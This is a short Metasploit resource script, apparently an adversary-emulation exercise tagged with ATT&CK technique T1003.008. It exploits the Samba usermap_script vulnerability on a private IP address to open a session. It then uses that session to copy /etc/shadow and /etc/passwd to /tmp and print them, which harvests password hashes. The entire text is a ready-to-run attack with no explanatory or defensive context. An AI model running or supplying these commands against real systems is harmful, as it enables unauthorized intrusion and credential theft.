use exploit/multi/samba/usermap_script
set RHOSTS 192.168.5.10
set LPORT 4646
exploit -z
sessions -c 'sudo cat /etc/shadow > /tmp/T1003.008shadow.txt' -i 1
sessions -c 'cat /tmp/T1003.008shadow.txt' -i 1
sessions -c 'cat /etc/passwd > /tmp/T1003.008passwd.txt' -i 1
sessions -c 'cat /tmp/T1003.008passwd.txt' -i 1
sessions -K
